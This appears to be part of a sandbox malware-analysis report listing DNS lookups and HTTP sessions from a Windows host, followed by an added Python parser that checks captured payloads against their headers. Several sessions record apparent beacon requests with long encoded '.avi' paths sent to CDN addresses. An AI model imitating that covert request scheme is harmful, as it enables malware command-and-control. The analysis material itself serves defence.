Sep 10, 2021 11:28:23.536730051 CEST | 8.8.8.8 | 192.168.2.5 | 0x5081 | No error (0) | srtb.msn.com | www.msn.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 10, 2021 11:28:23.536730051 CEST | 8.8.8.8 | 192.168.2.5 | 0x5081 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 10, 2021 11:28:24.585437059 CEST | 8.8.8.8 | 192.168.2.5 | 0x85e9 | No error (0) | img.img-taboola.com | tls13.taboola.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 10, 2021 11:28:24.585437059 CEST | 8.8.8.8 | 192.168.2.5 | 0x85e9 | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.1.44 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:24.585437059 CEST | 8.8.8.8 | 192.168.2.5 | 0x85e9 | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.65.44 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:24.585437059 CEST | 8.8.8.8 | 192.168.2.5 | 0x85e9 | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.129.44 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:28:24.585437059 CEST | 8.8.8.8 | 192.168.2.5 | 0x85e9 | No error (0) | tls13.taboola.map.fastly.net | - | 151.101.193.44 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:29.313858986 CEST | 8.8.8.8 | 192.168.2.5 | 0x17c6 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.199 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:29.313858986 CEST | 8.8.8.8 | 192.168.2.5 | 0x17c6 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.132 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:29.313858986 CEST | 8.8.8.8 | 192.168.2.5 | 0x17c6 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.204 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:29.313858986 CEST | 8.8.8.8 | 192.168.2.5 | 0x17c6 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.191 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:35.626282930 CEST | 8.8.8.8 | 192.168.2.5 | 0xd4f | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.132 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:35.626282930 CEST | 8.8.8.8 | 192.168.2.5 | 0xd4f | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.199 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:35.626282930 CEST | 8.8.8.8 | 192.168.2.5 | 0xd4f | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.204 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:35.626282930 CEST | 8.8.8.8 | 192.168.2.5 | 0xd4f | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.191 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:51.551887989 CEST | 8.8.8.8 | 192.168.2.5 | 0xf8d | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.199 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:51.551887989 CEST | 8.8.8.8 | 192.168.2.5 | 0xf8d | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.132 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:51.551887989 CEST | 8.8.8.8 | 192.168.2.5 | 0xf8d | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.204 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:29:51.551887989 CEST | 8.8.8.8 | 192.168.2.5 | 0xf8d | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.191 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:30:16.352951050 CEST | 8.8.8.8 | 192.168.2.5 | 0xaa17 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.204 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:30:16.352951050 CEST | 8.8.8.8 | 192.168.2.5 | 0xaa17 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.199 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:30:16.352951050 CEST | 8.8.8.8 | 192.168.2.5 | 0xaa17 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.132 | A (IP address) | IN (0x0001)
Sep 10, 2021 11:30:16.352951050 CEST | 8.8.8.8 | 192.168.2.5 | 0xaa17 | No error (0) | ocsp.sca1b.amazontrust.com | - | 13.225.29.191 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• https:
  • geolocation.onetrust.com
  • btloader.com
  • img.img-taboola.com
• ocsp.sca1b.amazontrust.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49768 | 104.20.185.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49782 | 104.26.7.139 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49955 | 13.225.29.199 | 80 | -
Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 11:29:51.585664034 CEST | 12998 | OUT | GET /images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Sep 10, 2021 11:29:51.669495106 CEST | 13000 | IN | HTTP/1.1 200 OK
    Content-Type: application/ocsp-response
    Content-Length: 5
    Connection: keep-alive
    Accept-Ranges: bytes
    Cache-Control: public, max-age=300
    Date: Fri, 10 Sep 2021 09:29:51 GMT
    ETag: "5f457bf7-5"
    Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
    Server: nginx
    X-Cache: Miss from cloudfront
    Via: 1.1 d6561aeeccb210202cf78b99f07c5235.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: CDG3-C2
    X-Amz-Cf-Id: VnegLro7JD62tXhPpcidZ6U3Q5V07_UmNarc4wxisJNmh537b-vMXg==
    Data Raw: 30 03 0a 01 06
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49969 | 13.225.29.204 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 11:30:16.404545069 CEST | 13045 | OUT | GET /images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE9/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Sep 10, 2021 11:30:16.717156887 CEST | 13046 | IN | HTTP/1.1 200 OK
    Content-Type: application/ocsp-response
    Content-Length: 5
    Connection: keep-alive
    Accept-Ranges: bytes
    Cache-Control: public, max-age=300
    Date: Fri, 10 Sep 2021 09:30:16 GMT
    ETag: "5fac0ccd-5"
    Last-Modified: Wed, 11 Nov 2020 16:09:49 GMT
    Server: nginx
    X-Cache: Miss from cloudfront
    Via: 1.1 12b082104e9893409b9ae6386e88d351.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: CDG3-C2
    X-Amz-Cf-Id: pz9Fybsh0l1w2fKUrC935xH53SlLjUabQxULZ_woeXDtm6L2foZa4g==
    Data Raw: 30 03 0a 01 06
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49816 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49819 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49820 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49817 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49821 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49818 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.5 | 49902 | 13.225.29.199 | 80 | -
Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 11:29:29.369950056 CEST | 8731 | OUT | GET /images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Sep 10, 2021 11:29:29.450870037 CEST | 8732 | IN | HTTP/1.1 200 OK
    Content-Type: application/ocsp-response
    Content-Length: 5
    Connection: keep-alive
    Accept-Ranges: bytes
    Cache-Control: public, max-age=300
    Date: Fri, 10 Sep 2021 09:29:29 GMT
    ETag: "5f457bf7-5"
    Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
    Server: nginx
    X-Cache: Miss from cloudfront
    Via: 1.1 d6bff47a79bb5fa9800d9ee4b2b92146.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: CDG3-C2
    X-Amz-Cf-Id: TolSfPdSUby3f19eRp5suDoRVbNDu7SM9kd9wr_xcYGqoK69heZmtw==
    Data Raw: 30 03 0a 01 06
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.5 | 49910 | 13.225.29.132 | 80 | -
Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 11:29:35.701522112 CEST | 8789 | OUT | GET /images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: ocsp.sca1b.amazontrust.com
    Connection: Keep-Alive
Sep 10, 2021 11:29:35.792062998 CEST | 8790 | IN | HTTP/1.1 200 OK
    Content-Type: application/ocsp-response
    Content-Length: 5
    Connection: keep-alive
    Accept-Ranges: bytes
    Cache-Control: public, max-age=300
    Date: Fri, 10 Sep 2021 09:29:35 GMT
    ETag: "5f457bf7-5"
    Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
    Server: nginx
    X-Cache: Miss from cloudfront
    Via: 1.1 89cec266da5afe1c0fd332f7f04e94e3.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: CDG3-C2
    X-Amz-Cf-Id: -oUGTVu-GkLdPQGRGAYqBQoQzjfxdzIhndGHl-cGPlyzfIPa107SRQ==
    Data Raw: 30 03 0a 01 06
    Data Ascii: 0


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49768 | 104.20.185.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:28:19 UTC | 0 | OUT | GET /cookieconsentpub/v1/geo/location HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: geolocation.onetrust.com
    Connection: Keep-Alive
2021-09-10 09:28:19 UTC | 0 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Sep 2021 09:28:19 GMT
    Content-Type: text/javascript
    Content-Length: 182
    Connection: close
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 68c7a0245b38c2bd-FRA
2021-09-10 09:28:19 UTC | 0 | IN | Data Ascii: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49782 | 104.26.7.139 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:28:20 UTC | 0 | OUT | GET /tag?o=6208086025961472&upapi=true HTTP/1.1
    Accept: application/javascript, */*;q=0.8
    Referer: https://www.msn.com/de-ch/?ocid=iehp
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: btloader.com
    Connection: Keep-Alive
2021-09-10 09:28:20 UTC | 1 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Sep 2021 09:28:20 GMT
    Content-Type: application/javascript
    Content-Length: 10055
    Connection: close
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=1800, must-revalidate
    Etag: "9e65f2af141ca0a7e5ebc06696b0cdb5"
    Vary: Origin
    Via: 1.1 google
    CF-Cache-Status: HIT
    Age: 1211
    Accept-Ranges: bytes
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6wvi%2FaU8O7s3HWgmF0z7xeUjzmMf%2FTvU48hNC93EFPTm7iXMN%2FDaIpY4EAu8MxNzOTqdEEGRyQIzkpsAGI4E46%2FOBkl3puLIifpPbwFUiTP0sMMa0Qyixp1uL5OJ5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 68c7a0266e9e4e80-FRA
                                                Data Ascii: y||window.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0-4-g367c57e",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}}
                                                2021-09-10 09:28:20 UTC5INData Raw: 65 78 4f 66 28 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 26 26 28 74 3d 21 30 2c 77 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 77 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 77 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61
                                                Data Ascii: exOf(n.toLowerCase()))&&(t=!0,w.websiteID=o[n].website_id,w.contentEnabled=o[n].content_enabled,w.mobileContentEnabled=o[n].mobile_content_enabled);t||((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,doma
                                                2021-09-10 09:28:20 UTC6INData Raw: 63 26 26 63 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 6c 3d 6e 2c 73 3d 31 2d 6e 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 72 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 6c 2b 73 2a 6f 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 6c 2b 73 2a 28 6f 2b 74 29 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 75 3d 74 5b 65 5d 3b 69 66 28 6e 75 6c 6c 21 3d 75 26 26 75 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 64 3d 6e 2b 28 31 2d 6e 29 2a 6f 2c 62 3d 28 31 2d 6e 29 2a 28 31 2d 6f 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 75 2e 62 75 6e 64 6c 65
                                                Data Ascii: c&&c.bundles){var l=n,s=1-n;Object.keys(c.bundles).sort().forEach(function(e){var t=c.bundles[e];r[e]={min:Math.trunc(100*(l+s*o)),max:Math.trunc(100*(l+s*(o+t)))},o+=t})}var u=t[e];if(null!=u&&u.bundles){var d=n+(1-n)*o,b=(1-n)*(1-o);Object.keys(u.bundle
                                                2021-09-10 09:28:20 UTC7INData Raw: 74 22 3a 35 37 31 30 31 35 30 38 35 32 36 37 33 35 33 36 2c 22 62 75 6e 64 6c 65 73 22 3a 7b 22 35 37 31 30 31 35 30 38 35 32 36 37 33 35 33 36 22 3a 31 7d 7d 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 70 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 61 6c 72 65 61 64 79 5f 69 6e 76 6f 6b 65 64 7c 7c 21 77 2e 77 65 62 73 69 74 65 49 44 3f 5b 32 5d 3a 28
                                                Data Ascii: t":5710150852673536,"bundles":{"5710150852673536":1}}},window.__bt_intrnl={traceID:p.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;return i(this,function(e){switch(e.label){case 0:return window.__bt_already_invoked||!w.websiteID?[2]:(
                                                2021-09-10 09:28:20 UTC9INData Raw: 7c 77 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 77 2e 77 65 62 73 69 74 65 49 44 26 26 77 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65 20 7c 6d 61 65 6d 6f 7c 6d 69 64 70 7c 6d 6d 70 7c 6d 6f 62 69 6c 65 2e 2b 66 69 72 65 66 6f 78 7c 6e 65 74 66 72 6f 6e 74 7c 6f 70 65 72 61 20 6d 28 6f 62 7c 69 6e 29 69 7c 70 61 6c 6d 28 20 6f 73
                                                Data Ascii: |w.mobileContentEnabled),w.websiteID&&w.contentEnabled&&(!(n=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os
                                                2021-09-10 09:28:20 UTC10INData Raw: 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c 31 32 7c 32 31 7c 33 32 7c 36 30 7c 5c 2d 5b 32 2d 37 5d 7c 69 5c 2d 29 7c 71 74 65 6b 7c 72 33 38 30 7c 72 36 30 30 7c 72 61 6b 73 7c 72 69 6d 39 7c 72 6f 28 76 65 7c 7a 6f 29 7c 73 35 35 5c 2f 7c
                                                Data Ascii: )|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|


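The stream tables above and below are the sandbox's rendering of one TCP session each: a timestamp, the running kBytes count, the direction and the payload, with the column boundaries lost in extraction ("UTC14INData Raw: ..."), and "Data Ascii" being a lossy view that drops every non-printable byte (fine for the btloader.com script, noise for the img-taboola.com JPEG). The following Python is added here as an example; it is not part of the Joe Sandbox report or its tooling. It parses rows in that fused format, rebuilds the payload from "Data Raw", reproduces the "Data Ascii" projection, and cross-checks a response body against its declared Content-Type and Content-Length by sniffing magic bytes. The row strings, the magic table and the "MZ under image/jpeg" row are constructed for the demo; the two hex prefixes are the opening bytes of the btloader.com script and of the img-taboola.com JPEG on this page, truncated. Both sessions are attributed to iexplore.exe fetching msn.com page assets; the same check tells an analyst whether a body is what its headers claim, which matters when deciding which of a sandbox's many streams deserve attention.

```python
"""Parse the flattened 'Data Raw' rows of a sandbox HTTP stream table and check them.

Added example for this report, not Joe Sandbox code. The row layout is assumed from
the table on this page: timestamp, running kBytes, direction (IN/OUT), then
'Data Raw: <hex bytes>'. All row strings and the magic-byte table are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Timestamp, kBytes and direction run together in the extracted text ("UTC14INData Raw: ...").
ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC)"
    r"(?P<kb>\d+)"
    r"(?P<dir>IN|OUT)"
    r"Data Raw: (?P<hex>[0-9a-f]{2}(?: [0-9a-f]{2})*)\s*$"
)

# Leading bytes of a few common formats and the Content-Type each implies (constructed table).
MAGIC = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF8", "image/gif"),
    (b"%PDF", "application/pdf"),
    (b"\x1f\x8b", "application/gzip"),
    (b"MZ", "application/vnd.microsoft.portable-executable"),
]

# Constructed rows in the report's format. The hex is the first bytes of the two
# responses on this page (btloader.com script, img-taboola.com JPEG), truncated.
JS_ROWS = [
    "2021-09-10 09:28:20 UTC1INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b",
]
JPEG_ROWS = [
    "2021-09-10 09:28:24 UTC14INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00",
]
# Constructed, not from this report: a PE header served under an image Content-Type.
PE_AS_IMAGE_ROWS = [
    "2021-09-10 09:28:24 UTC14INData Raw: 4d 5a 90 00 03 00 00 00",
]


@dataclass
class Chunk:
    timestamp: str
    kbytes: int
    direction: str
    data: bytes


def parse_row(line: str) -> Chunk:
    """Split one fused row into its four columns and decode the hex payload."""
    m = ROW_RE.match(line.strip())
    if m is None:
        raise ValueError(f"not a Data Raw row: {line[:60]!r}")
    return Chunk(m["ts"], int(m["kb"]), m["dir"], bytes.fromhex(m["hex"]))


def ascii_view(data: bytes) -> str:
    """Reproduce the report's 'Data Ascii' column: printable ASCII kept, all other bytes dropped.
    The projection is lossy, so a binary body degrades to noise; only Data Raw is faithful."""
    return "".join(chr(b) for b in data if 0x20 <= b <= 0x7E)


def sniff(data: bytes) -> Optional[str]:
    """Guess the MIME type from leading magic bytes; None when no entry matches."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime
    return None


def reassemble(rows: List[str], direction: str) -> bytes:
    """Concatenate the payloads flowing in one direction, in table order."""
    return b"".join(c.data for c in map(parse_row, rows) if c.direction == direction)


def check_body(rows: List[str], declared_type: str, content_length: int) -> Dict[str, object]:
    """Cross-check a reassembled response body against its own headers.

    type_matches is True/False when the magic is recognised and None otherwise;
    length_matches is False when the captured rows do not add up to Content-Length.
    """
    body = reassemble(rows, "IN")
    sniffed = sniff(body)
    declared = declared_type.split(";")[0].strip().lower()
    return {
        "sniffed": sniffed,
        "type_matches": None if sniffed is None else sniffed == declared,
        "length_matches": len(body) == content_length,
        "ascii_preview": ascii_view(body[:16]),
    }


if __name__ == "__main__":
    print(check_body(JPEG_ROWS, "image/jpeg", 33310))    # truncated body: length_matches False
    print(check_body(PE_AS_IMAGE_ROWS, "image/jpeg", 8))  # type_matches False
```

Run against the real rows of the second session, the 14 kB chunk sniffs as image/jpeg and its Content-Type agrees; the length check only passes once every IN row of the body has been fed in, so it doubles as a completeness check on what the report captured.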
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49816 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
